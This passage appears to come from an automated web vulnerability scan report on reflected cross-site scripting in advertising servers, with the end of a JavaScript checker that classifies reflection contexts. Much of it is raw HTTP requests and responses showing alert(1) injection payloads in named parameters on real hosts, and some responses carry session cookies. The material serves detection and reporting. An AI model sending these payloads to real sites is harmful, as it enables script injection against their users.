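  'html-attr-double': '"', 'html-attr-single': "'", 'html-tag': ' ', 'html-text': '<',
};

function confirmFinding(body, probe, contentType) {
  const context = classifyReflection(body, probe, contentType);
  const need = BREAKOUT[context];
  return { context, exploitable: need !== undefined && probe.includes(need) };
}

const SAMPLES = [
  { name: 'ad.reduxmedia.com /st, arbitrary parameter name', contentType: 'text/html',
    probe: '6cc2b"-alert(1)-"605cd6b88a5',
    body: '<html><head></head><body><script type="text/javascript">var rm_tag_type="";' +
      'rm_tag_type = "iframe"; rm_url = "http://ad.reduxmedia.com/imp?6cc2b"-alert(1)-"605cd6b88a5=1' +
      '&Z=120x600&s=681714&_salt=272437912";var RM_POP_COOKIE_NAME=\'ym_pop_freq\';</script></body></html>' },
  { name: 'ad.doubleclick.net /adi/dmd.ehow, REST URL parameter 3', contentType: 'text/html',
    probe: 'e1c21"><script>alert(1)</script>57155bc0307',
    body: '<html><head><title>Click here to find out more!</title></head><body>' +
      '<!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY --> <SCRIPT TYPE="text/javascript" ' +
      'SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage' +
      'e1c21"><script>alert(1)</script>57155bc0307&section_code=&click="></SCRIPT></body></html>' },
  { name: 'ad.harrenmedianetwork.com /imp, Z parameter (constructed body)', contentType: 'text/javascript',
    probe: "97345'-alert(1)-'e55a08937c8",
    body: "document.write('<iframe src=\"http://ad.harrenmedianetwork.com/st?Z=160x600" +
      "97345'-alert(1)-'e55a08937c8&section=429613\"></iframe>');" },
  { name: 'same probe, quotes entity-encoded by the server (constructed non-finding)', contentType: 'text/html',
    probe: '6cc2b"-alert(1)-"605cd6b88a5',
    body: '<script>rm_url = "http://ad.reduxmedia.com/imp?6cc2b&quot;-alert(1)-&quot;605cd6b88a5=1";</script>' },
];

function runSamples() {
  return SAMPLES.map((s) => ({ name: s.name, ...confirmFinding(s.body, s.probe, s.contentType) }));
}
```

Two details matter when reproducing the report's verdicts. A probe reflected inside the attributes of a script start tag (the SRC="..." findings) is an HTML attribute context, not a script context, which is why the report describes those as "an HTML tag attribute" and gives them no script-context remediation note; the classifier checks that the start tag's closing > precedes the probe before treating it as script. And a probe that is merely reflected is not a finding: the same "-alert(1)-" string reflected into plain HTML text, or with its quotes entity-encoded, is reported as not exploitable because it lacks the break-out character for that context.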
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9973'-alert(1)-'b683290dc0 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=300x250b9973'-alert(1)-'b683290dc0&s=601669&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 402
Connection: close
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abe80'-alert(1)-'f0f512ee374 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=300x250&s=601669abe80'-alert(1)-'f0f512ee374&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 404
Connection: close
The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dce2d'-alert(1)-'7ba8e3efc79 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=300x250dce2d'-alert(1)-'7ba8e3efc79&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close
The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a927c"><script>alert(1)</script>8783e6815d8 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=300x250a927c"><script>alert(1)</script>8783e6815d8&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close
The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9583"><script>alert(1)</script>2bc6827f86d was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=300x250&section=601669a9583"><script>alert(1)</script>2bc6827f86d HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close
The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f734e'-alert(1)-'2b959f792a9 was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=300x250&section=601669f734e'-alert(1)-'2b959f792a9 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219c9'-alert(1)-'d6a336d9756 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:49 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683569:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 848
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } fu ...[SNIP]...
The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ad93'-alert(1)-'3d320c11be8 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:40 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34426:1296683560:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:40 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 852
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58c87'-alert(1)-'b77056dfb54 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:17 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683597:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.writ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41b1e'-alert(1)-'97331fa72cc was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:35 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683615:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:35 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec678'-alert(1)-'8c695f1ae57 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:26 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683606:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:26 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9848'-alert(1)-'5b0c6c829a2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:08 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683588:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() {
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 304f9'-alert(1)-'df9bcca7015 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:59 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683579:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:59 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function ...[SNIP]...
1.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f68cc'-alert(1)-'ca9f21a572f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
